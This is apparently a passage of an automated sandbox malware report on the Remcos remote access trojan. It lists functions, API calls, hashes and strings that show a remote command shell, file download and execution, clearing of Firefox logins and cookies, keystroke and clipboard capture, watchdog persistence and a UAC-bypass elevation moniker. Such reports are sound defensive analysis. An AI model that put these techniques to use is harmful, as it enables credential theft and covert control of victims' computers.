                                                                                                                              • Opcode ID: 3153016868e91cfd35e28152446a85961119893ca57cc87871ad8776825d878a
                                                                                                                              • Instruction ID: 322a81cde454e9e37334ba9b95bb0fa1ede206ac4e259af1bd06cfbefbea5e10
                                                                                                                              • Opcode Fuzzy Hash: 3153016868e91cfd35e28152446a85961119893ca57cc87871ad8776825d878a
                                                                                                                              • Instruction Fuzzy Hash: 2CF0BE33510009FBDF005E95DC00CDE3B6DEF89338F100155FA24921A0EA72EE60ABE1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B58A9 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,046B5C84,?,?,00000000,?,046B5C84,00000000,0000000C), ref: 046B58C6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: cebc5cb74102d7d1ede294c2666d74007b37e50417620f32066d96f080b5a4da
                                                                                                                              • Instruction ID: a4371312d4e601a6d1dc63852480c2caa4fb3b922823a318e8ea6e1b80518dee
                                                                                                                              • Opcode Fuzzy Hash: cebc5cb74102d7d1ede294c2666d74007b37e50417620f32066d96f080b5a4da
                                                                                                                              • Instruction Fuzzy Hash: 76D06C3200020DBBDF028F84DC06EDA3BAAFB48714F014000BA1856060C736E861AB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 046648B3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Startup
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 724789610-0
                                                                                                                              • Opcode ID: e43bb6048945b2887eb3f3045032fd9cf51994bfea67167ecd427f60e19e7bfe
                                                                                                                              • Instruction ID: 13602c292bab1dca4726e849e9f760aef0a119ab2122f1ca306ed07302dc3c3e
                                                                                                                              • Opcode Fuzzy Hash: e43bb6048945b2887eb3f3045032fd9cf51994bfea67167ecd427f60e19e7bfe
                                                                                                                              • Instruction Fuzzy Hash: DDD0127295960C4EE721AAB4AC0F8E5775CC312615F0407AB6DB5835C2F6481B1CC2F7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 04667C97 Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 835filesleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetEvent.KERNEL32(?,?), ref: 04667CB9
                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 04667D87
                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 04667DA9
                                                                                                                                • Part of subcall function 0467C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C2EC
                                                                                                                                • Part of subcall function 0467C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C31C
                                                                                                                                • Part of subcall function 0467C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C371
                                                                                                                                • Part of subcall function 0467C291: FindClose.KERNEL32(00000000,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3D2
                                                                                                                                • Part of subcall function 0467C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3D9
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                                • Part of subcall function 04664AA1: WaitForSingleObject.KERNEL32(?,00000000,0466547D,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B), ref: 04664B47
                                                                                                                                • Part of subcall function 04664AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,046D4EF8,0466530B,?,?,?,?,?,0466547D), ref: 04664B75
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 04668197
                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 04668278
                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 046684C4
                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 04668652
                                                                                                                                • Part of subcall function 0466880C: __EH_prolog.LIBCMT ref: 04668811
                                                                                                                                • Part of subcall function 0466880C: FindFirstFileW.KERNEL32(00000000,?,Function_00066608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 046688CA
                                                                                                                                • Part of subcall function 0466880C: __CxxThrowException@8.LIBVCRUNTIME ref: 046688F2
                                                                                                                                • Part of subcall function 0466880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 046688FF
                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 046686F8
                                                                                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 0466873A
                                                                                                                                • Part of subcall function 0467C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0467CAD7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                                                              • API String ID: 1067849700-1507758755
                                                                                                                              • Opcode ID: 230f11b8882a842d746ba8a39bbcdf28e2c4a2b77d9dd81bb50d7507f094e4c5
                                                                                                                              • Instruction ID: 1b4ab880a8d09c024ba75e83498d564e6e6072a0495b670c9ed77572244fcda7
                                                                                                                              • Opcode Fuzzy Hash: 230f11b8882a842d746ba8a39bbcdf28e2c4a2b77d9dd81bb50d7507f094e4c5
                                                                                                                              • Instruction Fuzzy Hash: C0427171A04304ABE718FB75C8699FE77A9AF92608F80091CE54357191FE34BA09C7DB
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466569A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 046656E6
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 04665723
                                                                                                                              • CreatePipe.KERNEL32(046D6CCC,046D6CB4,046D6BD8,00000000,046C60BC,00000000), ref: 046657B6
                                                                                                                              • CreatePipe.KERNEL32(046D6CB8,046D6CD4,046D6BD8,00000000), ref: 046657CC
                                                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,046D6BE8,046D6CBC), ref: 0466583F
                                                                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 04665897
                                                                                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 046658BC
                                                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 046658E9
                                                                                                                                • Part of subcall function 04694770: __onexit.LIBCMT ref: 04694776
                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,046D4F90,Function_000660C0,00000062,Function_000660A4), ref: 046659E4
                                                                                                                              • Sleep.KERNEL32(00000064,00000062,Function_000660A4), ref: 046659FE
                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 04665A17
                                                                                                                              • CloseHandle.KERNEL32 ref: 04665A23
                                                                                                                              • CloseHandle.KERNEL32 ref: 04665A2B
                                                                                                                              • CloseHandle.KERNEL32 ref: 04665A3D
                                                                                                                              • CloseHandle.KERNEL32 ref: 04665A45
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                              • String ID: SystemDrive$cmd.exe
                                                                                                                              • API String ID: 2994406822-3633465311
                                                                                                                              • Opcode ID: 08aa0d3519c40bf520cda46f37196d286b8272779d05665b6af6c38879ff49ce
                                                                                                                              • Instruction ID: 542b70a33e80e6e0f89981d8dea1e9436d18c1c0894ce755b80d2b39ac1ff237
                                                                                                                              • Opcode Fuzzy Hash: 08aa0d3519c40bf520cda46f37196d286b8272779d05665b6af6c38879ff49ce
                                                                                                                              • Instruction Fuzzy Hash: FB91C4B1E45204BFE710BF38EC55A2E3BA9EF84648F00142DF54796291FE79BC448B69
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046720F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 04672106
                                                                                                                                • Part of subcall function 04673877: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04673885
                                                                                                                                • Part of subcall function 04673877: RegSetValueExA.KERNEL32(?,000000AF,00000000,00000004,00000001,00000004,?,?,?,0466C152,046C6C48,00000001,000000AF,Function_000660A4), ref: 046738A0
                                                                                                                                • Part of subcall function 04673877: RegCloseKey.ADVAPI32(?,?,?,?,0466C152,046C6C48,00000001,000000AF,Function_000660A4), ref: 046738AB
                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 04672146
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04672155
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,046727EE,00000000,00000000,00000000), ref: 046721AB
                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0467241A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                              • API String ID: 3018269243-13974260
                                                                                                                              • Opcode ID: 1d6023bbefe89f8b968c0f5f1ef434e1caf62ed847f208dd4ec090761562165e
                                                                                                                              • Instruction ID: 0f3db63fe0845385c8c2de785feb3b00745333ff65c8ca0e7ab3bcc63b6e4554
                                                                                                                              • Opcode Fuzzy Hash: 1d6023bbefe89f8b968c0f5f1ef434e1caf62ed847f208dd4ec090761562165e
                                                                                                                              • Instruction Fuzzy Hash: EE7190316043005BE714FB70D8659BEB3E4EFA5618F40096DF54792190FF34BA09CAEA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0466BBAF
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466BBC9
                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0466BCEC
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466BD12
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                              • API String ID: 1164774033-3681987949
                                                                                                                              • Opcode ID: e6a073d1a50112cff3166cf9d49a9d08aa99a616b55926e8d828b74895f31a46
                                                                                                                              • Instruction ID: 9e230bcc889342613ce0588826c4991ba9fb3a76f4cda44b9b3ce011265ca442
                                                                                                                              • Opcode Fuzzy Hash: e6a073d1a50112cff3166cf9d49a9d08aa99a616b55926e8d828b74895f31a46
                                                                                                                              • Instruction Fuzzy Hash: 6E513871D10119ABEB18FBB0DC59DEDB778AF11608F00056EE407A2190FF707A8ACA99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0466BDAF
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466BDC9
                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0466BE89
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466BEAF
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466BED0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                              • API String ID: 3527384056-432212279
                                                                                                                              • Opcode ID: dd539ccc618e1120149c21539ecc8d3ca13d0565a6a5e051beaa31ca91a73fe9
                                                                                                                              • Instruction ID: ed20b96c144e7867a4e210a69f5e85bab74db0a89b909a1fbbfc4c16e9aa16cb
                                                                                                                              • Opcode Fuzzy Hash: dd539ccc618e1120149c21539ecc8d3ca13d0565a6a5e051beaa31ca91a73fe9
                                                                                                                              • Instruction Fuzzy Hash: 29416C31D00229ABEB14FBB4DC59CFDB7A8EF15614F40016DE507A6180FF347A8ACA99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046768C1 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenClipboard.USER32 ref: 046768C2
                                                                                                                              • EmptyClipboard.USER32 ref: 046768D0
                                                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 046768F0
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 046768F9
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0467692F
                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 04676938
                                                                                                                              • CloseClipboard.USER32 ref: 04676955
                                                                                                                              • OpenClipboard.USER32 ref: 0467695C
                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0467696C
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 04676975
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0467697E
                                                                                                                              • CloseClipboard.USER32 ref: 04676984
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3520204547-0
                                                                                                                              • Opcode ID: c9423907a98468b84f13dd7273162dd161f52cd6120c99c5087be7c742bc42ca
                                                                                                                              • Instruction ID: 5291e3624ad1a2cb6ccc39644a2ac61290a0329732d02c0841db4413e4be937c
                                                                                                                              • Opcode Fuzzy Hash: c9423907a98468b84f13dd7273162dd161f52cd6120c99c5087be7c742bc42ca
                                                                                                                              • Instruction Fuzzy Hash: 512153B16043006FE714BBB0D85CABE76A9EF96705F40181DF607822D1FF38AD49C6A6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04679627 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                                                                              • API String ID: 0-3177665633
                                                                                                                              • Opcode ID: 53484ed0c5329754cd10a7c3924f2fff045a5ff441f8676b70165cad40169c1c
                                                                                                                              • Instruction ID: 76579c114e339653d9c8b3472e2d876ab9553e157c18805a573afe5712a5eea1
                                                                                                                              • Opcode Fuzzy Hash: 53484ed0c5329754cd10a7c3924f2fff045a5ff441f8676b70165cad40169c1c
                                                                                                                              • Instruction Fuzzy Hash: 05718DB0548341AFF304EF20E891BAABBD49F95314F04491DE593572E0FA74BA4ECB96
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046674FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _wcslen.LIBCMT ref: 04667521
                                                                                                                              • CoGetObject.OLE32(?,00000024,046C6518,00000000), ref: 04667582
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Object_wcslen
                                                                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                              • API String ID: 240030777-3166923314
                                                                                                                              • Opcode ID: e581e28d688b11b498ec0b59751de2faf2f6f5e48e231d4af6431663e32e8ce3
                                                                                                                              • Instruction ID: f53245dac4908142125d4a571eee7bc8cf4b8abf6d3e806351708a374f5aa87c
                                                                                                                              • Opcode Fuzzy Hash: e581e28d688b11b498ec0b59751de2faf2f6f5e48e231d4af6431663e32e8ce3
                                                                                                                              • Instruction Fuzzy Hash: 9411AC71950214ABEB10EB94D858DDDB7BCDB54719F14005EE909F3200F674BE458AF9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,046D58E8), ref: 0467A75E
                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0467A7AD
                                                                                                                              • GetLastError.KERNEL32 ref: 0467A7BB
                                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0467A7F3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3587775597-0
                                                                                                                              • Opcode ID: 44491514939347f1e3da6ca8b19201c3d21ba329dacc510b7879bdf102eb9092
                                                                                                                              • Instruction ID: a96dc95b2e64d6d2d85ea5a4430a363ef15777f7e5a2f9e4f7ed9f4fc105a3a3
                                                                                                                              • Opcode Fuzzy Hash: 44491514939347f1e3da6ca8b19201c3d21ba329dacc510b7879bdf102eb9092
                                                                                                                              • Instruction Fuzzy Hash: 0D813671108300ABE314EB60D8949AFB7E8FF95719F50491EF58682250FF70FA49CB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0466C39B
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0466C46E
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466C47D
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0466C4A8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                              • API String ID: 1164774033-405221262
                                                                                                                              • Opcode ID: eb5b271f1e89706303eb25b821bcd71881d020eca55b6e0144637ed0dfaa4221
                                                                                                                              • Instruction ID: b1e2e6ee4ca6c13343a79da0ff6f037cb582396f4990f2516056ff0da8c44878
                                                                                                                              • Opcode Fuzzy Hash: eb5b271f1e89706303eb25b821bcd71881d020eca55b6e0144637ed0dfaa4221
                                                                                                                              • Instruction Fuzzy Hash: F33140719043195BEB14F7A1DC98DFDB7B8AF11719F00015DA407A2194FF74BA8ACA9C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C2EC
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C31C
                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C38E
                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C39B
                                                                                                                                • Part of subcall function 0467C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C371
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3BC
                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3D2
                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3D9
                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,046D52D8,046D52F0,00000001), ref: 0467C3E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2341273852-0
                                                                                                                              • Opcode ID: f89c781afc4c212a5966aaf7903600df415e1cb85004b2b46011e0db35c5e46c
                                                                                                                              • Instruction ID: 9d07119c9791597f409e24c2ba3a34cdf2252f46454348fe76bc392a30873341
                                                                                                                              • Opcode Fuzzy Hash: f89c781afc4c212a5966aaf7903600df415e1cb85004b2b46011e0db35c5e46c
                                                                                                                              • Instruction Fuzzy Hash: A931727290121C9AEF34EAA0DC48EDA77BCEF04314F4405A9E655E2140FF75BEC88BA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32 ref: 0466A416
                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0466A422
                                                                                                                              • GetKeyboardLayout.USER32(00000000), ref: 0466A429
                                                                                                                              • GetKeyState.USER32(00000010), ref: 0466A433
                                                                                                                              • GetKeyboardState.USER32(?), ref: 0466A43E
                                                                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0466A461
                                                                                                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0466A4C1
                                                                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0466A4FA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1888522110-0
                                                                                                                              • Opcode ID: 133b279c1a205e0e5ba619534724ac14d53a41c9411383ab0b78c8b9e9983e89
                                                                                                                              • Instruction ID: 99fe3b2f2e587ee458a2610c32415d0150a2c33ec85ae6d1451fafceb8dbc839
                                                                                                                              • Opcode Fuzzy Hash: 133b279c1a205e0e5ba619534724ac14d53a41c9411383ab0b78c8b9e9983e89
                                                                                                                              • Instruction Fuzzy Hash: A4313D72604308BFD710DB94DC44F9BB7ECEB88744F00082AF646D61A0F6B5A9588BA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04673FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0467409D
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 046740A9
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
